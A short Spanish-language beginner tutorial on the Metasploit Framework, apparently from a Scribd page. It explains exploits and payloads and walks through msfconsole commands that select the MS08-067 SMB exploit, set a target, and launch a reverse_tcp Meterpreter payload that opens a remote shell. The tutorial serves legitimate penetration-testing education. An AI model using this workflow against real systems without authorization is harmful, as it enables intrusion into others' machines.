0% encontró este documento útil (0 votos)
21 vistas1 página

Tutorial Metasploit Framework

Tutorial Metasploit Framework

Cargado por

Borja Villalba
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
21 vistas1 página

Tutorial Metasploit Framework

Tutorial Metasploit Framework

Cargado por

Borja Villalba
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

TUTORIAL METASPLOIT

Imagina que Metasploit es como una navaja suiza para la seguridad informática. Es una herramienta que reúne una gran colección de
"llaves" (llamadas exploits) para probar si los sistemas informáticos tienen "cerraduras" débiles o vulnerables.
Los profesionales de la seguridad la usan para encontrar fallos de seguridad antes de que lo hagan los ciberdelincuentes.

Metasploit tiene varias partes, pero las más importantes son:


• Exploits: Son como las recetas para aprovechar un fallo de seguridad en un programa, sistema operativo o aplicación.
• Payloads: Lo que quieres que ocurra después de exploit funcione. ejemplo, podría darte control sobre el sistema vulnerable.
• Módulos Auxiliares: Herramientas para hacer otras tareas, como escanear redes o buscar información sobre un objetivo.

Paso 1: Iniciar Metasploit


Primero, abres una terminal y escribes el siguiente comando para iniciar la herramienta:
Bash msfconsole
Verás una pantalla de bienvenida con un banner.

Paso 2: Buscar una vulnerabilidad (Exploit)


Supongamos que sabes que un programa específico tiene una vulnerabilidad. Puedes buscar un exploit para ese fallo. Por ejemplo, para
buscar un fallo en un programa llamado "x_programa", usarías:
Bash search x_programa
Metasploit te mostrará una lista de exploits disponibles relacionados con tu búsqueda.

Paso 3: Seleccionar el Exploit


Una vez que encuentres un exploit que te interese, lo seleccionas con el comando use seguido del nombre del exploit. Por ejemplo:
Bash use exploit/windows/smb/ms08_067_netapi

Paso 4: Ver y configurar las opciones


Cada exploit necesita que le des información, como la dirección IP del objetivo. Para ver qué información necesita, escribe:
Bash show options
Verás una lista de opciones. La más común es RHOSTS, que es la IP del objetivo. La configuras así:
Bash set RHOSTS [Link]

Paso 5: Seleccionar y configurar el Payload


Ahora eliges qué acción quieres realizar si el exploit tiene éxito. Primero ves los payloads compatibles:
Bash show payloads
Luego, seleccionas uno. Un payload común te da una línea de comandos en el sistema atacado:
Bash set payload windows/meterpreter/reverse_tcp
Este payload también necesitará tu propia dirección IP (LHOST) para saber a dónde conectarse:
Bash set LHOST [Link]

Paso 6: Lanzar el ataque


Una vez que todo está configurado, lanzas el ataque con el comando:
Bash exploit
Si el exploit funciona, ¡conseguirás acceso al sistema! Verás una nueva línea de comandos, como meterpreter>.

Resumen de Comandos Clave


• msfconsole: Inicia Metasploit.
• search: Busca módulos (exploits, auxiliares, etc.).
• use: Selecciona un módulo.
• show options: Muestra las opciones que necesita el módulo.
• set: Configura una opción (ej. set RHOSTS ...).
• exploit: Ejecuta el ataque.
Este es un resumen muy básico, pero te da una idea clara del proceso. Metasploit es una herramienta muy potente con muchísimas más
funciones.

También podría gustarte